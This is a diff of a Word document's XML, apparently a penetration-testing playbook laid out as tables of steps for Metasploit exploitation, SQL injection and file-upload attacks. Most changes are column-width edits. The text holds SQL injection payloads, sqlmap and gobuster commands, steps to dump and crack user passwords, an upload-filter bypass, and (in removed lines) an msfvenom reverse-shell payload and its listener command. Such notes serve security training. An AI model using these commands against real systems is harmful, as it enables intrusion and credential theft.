+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Run the MSFconsole and select the exploit for the vulnerable service (if the module doesn’t work, try the exploit manually)</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -1012,7 +1018,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1282" w:type="dxa"/>
+            <w:tcW w:w="1280" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -1070,7 +1076,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6340" w:type="dxa"/>
+            <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -1098,7 +1104,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1282" w:type="dxa"/>
+            <w:tcW w:w="1280" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -1157,7 +1163,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6340" w:type="dxa"/>
+            <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -1184,7 +1190,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1282" w:type="dxa"/>
+            <w:tcW w:w="1280" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -1242,7 +1248,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6340" w:type="dxa"/>
+            <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -1270,7 +1276,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1282" w:type="dxa"/>
+            <w:tcW w:w="1280" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -1329,7 +1335,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6340" w:type="dxa"/>
+            <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -1364,7 +1370,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1282" w:type="dxa"/>
+            <w:tcW w:w="1280" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -1479,12 +1485,12 @@
         <w:tblLook w:val="04a0" w:noHBand="0" w:noVBand="1" w:firstColumn="1" w:lastRow="0" w:lastColumn="0" w:firstRow="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="1525"/>
-        <w:gridCol w:w="497"/>
+        <w:gridCol w:w="1523"/>
+        <w:gridCol w:w="499"/>
         <w:gridCol w:w="2290"/>
         <w:gridCol w:w="2290"/>
-        <w:gridCol w:w="1760"/>
-        <w:gridCol w:w="1282"/>
+        <w:gridCol w:w="1762"/>
+        <w:gridCol w:w="1280"/>
       </w:tblGrid>
       <w:tr>
         <w:trPr>
@@ -1944,7 +1950,7 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1525" w:type="dxa"/>
+            <w:tcW w:w="1523" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -1991,7 +1997,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="8119" w:type="dxa"/>
+            <w:tcW w:w="8121" w:type="dxa"/>
             <w:gridSpan w:val="5"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -2051,7 +2057,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6340" w:type="dxa"/>
+            <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -2079,7 +2085,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1282" w:type="dxa"/>
+            <w:tcW w:w="1280" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -2138,7 +2144,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6340" w:type="dxa"/>
+            <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -2185,7 +2191,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1282" w:type="dxa"/>
+            <w:tcW w:w="1280" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -2243,7 +2249,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6340" w:type="dxa"/>
+            <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -2271,7 +2277,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1282" w:type="dxa"/>
+            <w:tcW w:w="1280" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -2330,7 +2336,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6340" w:type="dxa"/>
+            <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -2346,53 +2352,6 @@
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t>Look through the webpage for a login page or a search bar.</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t>This can be done manually or gobuster can be used</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t xml:space="preserve">gobuser dir -u $WEB -w </w:t>
-            </w:r>
             <w:r>
               <w:rPr>
                 <w:i w:val="false"/>
@@ -2400,13 +2359,13 @@
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
-              <w:t>“/usr/share/seclists/Discovery/Web-Content/raft-small-words.txt”</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1282" w:type="dxa"/>
+              <w:t>Look for the entry point for SQL injections</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1280" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -2464,7 +2423,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6340" w:type="dxa"/>
+            <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -2492,7 +2451,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1282" w:type="dxa"/>
+            <w:tcW w:w="1280" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -2545,13 +2504,13 @@
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
-              <w:t>Test login page for SQLi</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6340" w:type="dxa"/>
+              <w:t>Test  page for SQLi</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -2572,117 +2531,33 @@
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
-              <w:t>Test the login for basic SQLi with the following payloads</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t xml:space="preserve">‘ </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t>OR 1=1; --</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t>admin--</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t>or use SQLmap</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t xml:space="preserve">plus more </w:t>
-            </w:r>
-            <w:hyperlink r:id="rId2">
-              <w:r>
-                <w:rPr>
-                  <w:rStyle w:val="InternetLink"/>
-                  <w:kern w:val="0"/>
-                  <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-                </w:rPr>
-                <w:t>https://book.hacktricks.xyz/pentesting-web/sql-injection</w:t>
-              </w:r>
-            </w:hyperlink>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1282" w:type="dxa"/>
+              <w:t>Manually exploit or use SQLmap with an intercepted request saved as a file from burpsuite</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>sqlmap -r request.file</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1280" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -2740,7 +2615,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6340" w:type="dxa"/>
+            <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -2768,7 +2643,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1282" w:type="dxa"/>
+            <w:tcW w:w="1280" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -2821,13 +2696,13 @@
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
-              <w:t>Perform PrivEsc once logged</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6340" w:type="dxa"/>
+              <w:t>Dump tables for credentials</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -2856,13 +2731,13 @@
                 <w:shd w:fill="auto" w:val="clear"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
-              <w:t>Once successfully logged in as admin, determine how to perform privesc and go from there.</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1282" w:type="dxa"/>
+              <w:t>Dump the table and attempt to crack/view passwords of user table</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1280" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -2966,12 +2841,12 @@
         <w:tblLook w:val="04a0" w:noHBand="0" w:noVBand="1" w:firstColumn="1" w:lastRow="0" w:lastColumn="0" w:firstRow="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="1525"/>
-        <w:gridCol w:w="497"/>
+        <w:gridCol w:w="1523"/>
+        <w:gridCol w:w="499"/>
         <w:gridCol w:w="2290"/>
         <w:gridCol w:w="2290"/>
-        <w:gridCol w:w="1760"/>
-        <w:gridCol w:w="1282"/>
+        <w:gridCol w:w="1762"/>
+        <w:gridCol w:w="1280"/>
       </w:tblGrid>
       <w:tr>
         <w:trPr>
@@ -3420,14 +3295,7 @@
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
-              <w:t xml:space="preserve">Msfvenom, metasploit, </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t>burpsuite</w:t>
+              <w:t>Msfvenom, metasploit, burpsuite</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3438,7 +3306,7 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1525" w:type="dxa"/>
+            <w:tcW w:w="1523" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -3485,7 +3353,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="8119" w:type="dxa"/>
+            <w:tcW w:w="8121" w:type="dxa"/>
             <w:gridSpan w:val="5"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -3506,14 +3374,7 @@
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
-              <w:t xml:space="preserve">This is attack is </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t xml:space="preserve">to target insecure/unsanatised file uploads. A malicious file will be uploaded that will create a reverse shell on the host machine for the attacker to connect to </w:t>
+              <w:t xml:space="preserve">This is attack is to target insecure/unsanatised file uploads. A malicious file will be uploaded that will create a reverse shell on the host machine for the attacker to connect to </w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3552,7 +3413,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6340" w:type="dxa"/>
+            <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -3580,7 +3441,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1282" w:type="dxa"/>
+            <w:tcW w:w="1280" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -3633,13 +3494,13 @@
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
-              <w:t>Create malicious file</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6340" w:type="dxa"/>
+              <w:t>Locate upload page</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -3655,60 +3516,18 @@
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="0" w:name="msfvenom-command"/>
-            <w:bookmarkEnd w:id="0"/>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t xml:space="preserve">msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=9001 -f </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t>php</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> -o </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t>rev.php</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1282" w:type="dxa"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Locate the page where files can be uploaded and test with a test file</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1280" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -3766,7 +3585,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6340" w:type="dxa"/>
+            <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -3794,7 +3613,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1282" w:type="dxa"/>
+            <w:tcW w:w="1280" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -3847,61 +3666,42 @@
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
-              <w:t>Listen for shell</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6340" w:type="dxa"/>
+              <w:t>Upload file</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:pStyle w:val="PreformattedText"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:bookmarkStart w:id="1" w:name="listener-command"/>
-            <w:bookmarkEnd w:id="1"/>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t>msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 192.168.0.10; set lport 9001; exploit"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1282" w:type="dxa"/>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:i w:val="false"/>
+                <w:iCs w:val="false"/>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t xml:space="preserve">If there is no sanitisation go to the php file and open it creating the reverse shell. </w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1280" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -3959,7 +3759,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6340" w:type="dxa"/>
+            <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -3987,7 +3787,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1282" w:type="dxa"/>
+            <w:tcW w:w="1280" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -4040,13 +3840,13 @@
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
-              <w:t>Upload file</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6340" w:type="dxa"/>
+              <w:t>Security bypass</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -4069,13 +3869,13 @@
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
-              <w:t>Locate the upload page. If there is no sanitisation go to the php file and open it creating the reverse shell. If there appears to some security, change the file extension to .php.jpeg, intercept request and change back to .php</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1282" w:type="dxa"/>
+              <w:t>If there appears to some security e.g only allow images, change the file extension to .php.jpeg, intercept request and change back to .php</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1280" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -4133,7 +3933,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6340" w:type="dxa"/>
+            <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -4161,7 +3961,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1282" w:type="dxa"/>
+            <w:tcW w:w="1280" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -4220,7 +4020,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6340" w:type="dxa"/>
+            <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
